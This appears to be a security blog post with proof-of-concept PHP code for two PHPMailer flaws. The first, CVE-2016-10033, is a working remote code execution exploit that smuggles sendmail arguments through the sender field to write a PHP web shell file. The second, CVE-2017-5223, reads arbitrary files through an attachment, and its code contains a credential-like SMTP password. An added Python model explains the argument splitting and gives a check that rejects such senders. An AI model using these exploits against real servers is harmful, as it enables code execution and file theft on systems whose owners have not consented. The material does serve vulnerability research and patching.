PHP mail command execution: exploiting the PHPMailer command execution and arbitrary file read vulnerabilities (with PoC)


PHPMailer command execution vulnerability (CVE-2016-10033)

Vulnerability ID: CVE-2016-10033

Affected versions: PHPMailer < 5.2.18

Severity: High

PoC:

<?php

/*

PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

A simple PoC (working on Sendmail MTA)

It will inject the following parameters to sendmail command:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]

which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:

<<< --b1_cb4566aa51be9f090d9419163e492306
<<< Content-Type: text/html; charset=us-ascii
<<<
<<< <?php phpinfo(); ?>
09607 <<<
<<<
<<<
<<< --b1_cb4566aa51be9f090d9419163e492306--

See the full advisory URL for details.

*/

// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';
$msg_body = "<?php phpinfo(); ?>";

// ------------------

// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"

$mail->SetFrom($email_from, 'Client Name');

$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");

$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);

if(!$mail->Send()) {
    echo "Mailer Error: " . $mail->ErrorInfo;
} else {
    echo "Message sent!\n";
}
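Added example (not part of the original post and not PHPMailer code): a Python model of why the sender string in the PoC above reaches sendmail as the seven arguments listed, plus a check a defender can use to reject such senders before they are handed to the mailer. It assumes the sender is appended as `-f<sender>` and passed through PHP's `escapeshellcmd()` before the shell splits it; `escapeshellcmd_model`, `sendmail_argv` and `sender_is_safe` are hypothetical names, the first being a simplified re-implementation, with `shlex.split` standing in for the shell's word splitting.

```python
import shlex

# The sender string from the PoC above (PHP single-quoted, so the backslash is literal).
POC_SENDER = '"attacker\\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com'

# Characters the model prefixes with a backslash, as PHP's escapeshellcmd() does on Unix.
_META = set('#&;`|*?~<>^()[]{}$\\\n\xff')

def escapeshellcmd_model(s):
    """Simplified model of escapeshellcmd(): a quote is escaped only when unpaired."""
    out, closing = [], None              # closing: index of the quote ending the open pair
    for i, ch in enumerate(s):
        if ch in '"\'':
            if closing is None:
                nxt = s.find(ch, i + 1)
                if nxt != -1:
                    closing = nxt        # opens a pair: passed through untouched
                else:
                    out.append('\\')     # lone quote: escaped
            elif i == closing:
                closing = None           # closes the pair: passed through untouched
            else:
                out.append('\\')         # other quote type inside a pair: escaped
        elif ch in _META:
            out.append('\\')
        out.append(ch)
    return ''.join(out)

def sendmail_argv(sender, sendmail='/usr/sbin/sendmail -t -i'):
    """argv the MTA would receive when '-f' + sender is appended to the command line."""
    return shlex.split(sendmail + ' ' + escapeshellcmd_model('-f' + sender))

def sender_is_safe(sender):
    """True only if the sender survives as exactly one -f argument."""
    try:
        # 3 = number of tokens in the default sendmail command above
        return sendmail_argv(sender)[3:] == ['-f' + sender]
    except ValueError:                   # quoting that the shell model cannot balance
        return False

if __name__ == '__main__':
    for n, arg in enumerate(sendmail_argv(POC_SENDER)):
        print(f'Arg no. {n} == [{arg}]')
    print('PoC sender safe?', sender_is_safe(POC_SENDER))
    print('plain sender safe?', sender_is_safe('client@example.com'))
```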

PHPMailer arbitrary file read vulnerability analysis (CVE-2017-5223)

Vulnerability ID: CVE-2017-5223

Affected versions: PHPMailer <= 5.2.21

Severity: High

PoC:

<?php
#Author:Yxlink
require_once('PHPMailerAutoload.php');

$mail = new PHPMailer();
$mail->isSMTP();
$mail->Host = 'smtp.qq.com';
$mail->Port = 465;
$mail->SMTPAuth = true;
$mail->Username = 'xxxx@qq.com'; // QQ mailbox
$mail->Password = 'zsuhxbmsaioxbcgb'; // 16-character password obtained when enabling mail-client access; not the same as the QQ password
$mail->SMTPSecure = 'ssl';
$mail->CharSet = "UTF-8";
$mail->Encoding = "base64";

$mail->Subject = "hello";
$mail->From = "xxxx@qq.com";
$mail->FromName = "test";

$address = "xxxx@qq.com";
$mail->AddAddress($address, "test");

$mail->AddAttachment('test.txt','test.txt');
$mail->IsHTML(true);
$msg="test";
$mail->msgHTML($msg);

if(!$mail->Send()) {
    echo "Mailer Error: " . $mail->ErrorInfo;
} else {
    echo "Message sent!";
}
?>
